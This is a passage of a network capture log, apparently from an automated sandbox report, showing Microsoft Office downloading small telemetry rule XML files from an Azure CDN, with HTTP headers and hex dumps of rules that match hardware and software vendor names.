                                          2024-11-18 22:44:51 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          59192.168.2.45733713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:51 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:51 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 486
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                          ETag: "0x8DC582B92FCB436"
                                          x-ms-request-id: a9c4265b-101e-000b-57af-365e5c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224451Z-16547b76f7fljddfhC1DFWeqbs00000007c0000000000kay
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:51 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          60192.168.2.45733813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:52 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:52 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 423
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                          ETag: "0x8DC582BB7564CE8"
                                          x-ms-request-id: f08eb9b9-301e-0000-60ae-37eecc000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224452Z-164f84587bfjxw6fhC1DFWq94400000006fg00000000y647
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:52 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          61192.168.2.45733913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:52 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:52 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 478
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                          ETag: "0x8DC582B9B233827"
                                          x-ms-request-id: 8c3bac6a-901e-0015-469b-38b284000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224452Z-1866b5c5fbbls4jchC1DFWnmb400000001xg000000000gcy
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:52 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          62192.168.2.45734013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:52 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:52 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 404
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                          ETag: "0x8DC582B95C61A3C"
                                          x-ms-request-id: 8417a631-c01e-00a2-12c6-372327000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224452Z-16547b76f7fr5rfnhC1DFW0am400000003vg00000000q604
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:52 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          63192.168.2.45734113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:52 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:52 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 468
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                          ETag: "0x8DC582BB046B576"
                                          x-ms-request-id: 45d643d4-001e-0066-6189-38561e000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224452Z-16547b76f7fsq6p7hC1DFWfx6800000004sg000000010g3n
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          64192.168.2.45734213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:52 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:52 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 400
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                          ETag: "0x8DC582BB2D62837"
                                          x-ms-request-id: 7b112b71-901e-005b-73c6-372005000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224452Z-1866b5c5fbbg9tvxhC1DFWy9mg00000002a000000000ban7
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:52 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          65192.168.2.45734413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:53 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:53 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:53 GMT
                                          Content-Type: text/xml
                                          Content-Length: 425
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                          ETag: "0x8DC582BBA25094F"
                                          x-ms-request-id: ebe8c05c-701e-003e-40ef-3979b3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224453Z-r18f44ddb699qlj8hC1DFWad8c00000000kg00000000cs7x
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:53 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          66192.168.2.45734513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:53 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:53 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:53 GMT
                                          Content-Type: text/xml
                                          Content-Length: 475
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                          ETag: "0x8DC582BB2BE84FD"
                                          x-ms-request-id: 373f0e0b-901e-008f-80b0-3767a6000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224453Z-r18f44ddb69tncq7hC1DFW3ke800000000kg00000000d025
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:53 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          67192.168.2.45734613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:53 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:53 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:53 GMT
                                          Content-Type: text/xml
                                          Content-Length: 491
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                          ETag: "0x8DC582B98B88612"
                                          x-ms-request-id: 5bab3dd3-d01e-00a1-43fa-3935b1000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224453Z-17cf5b775c42k66jhC1DFW26b800000000cg0000000046dt
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:53 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          68192.168.2.45734713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:53 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:53 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:53 GMT
                                          Content-Type: text/xml
                                          Content-Length: 448
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                          ETag: "0x8DC582BB389F49B"
                                          x-ms-request-id: 0fe31a08-b01e-001e-2cae-360214000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224453Z-1866b5c5fbbfhwqqhC1DFWc9sw00000000xg00000000bmkb
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:53 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          69192.168.2.45734313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:54 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:54 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 479
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                          ETag: "0x8DC582BB7D702D0"
                                          x-ms-request-id: 316038b9-a01e-006f-2591-3713cd000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224454Z-1866b5c5fbbfhwqqhC1DFWc9sw00000000wg00000000ef3a
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
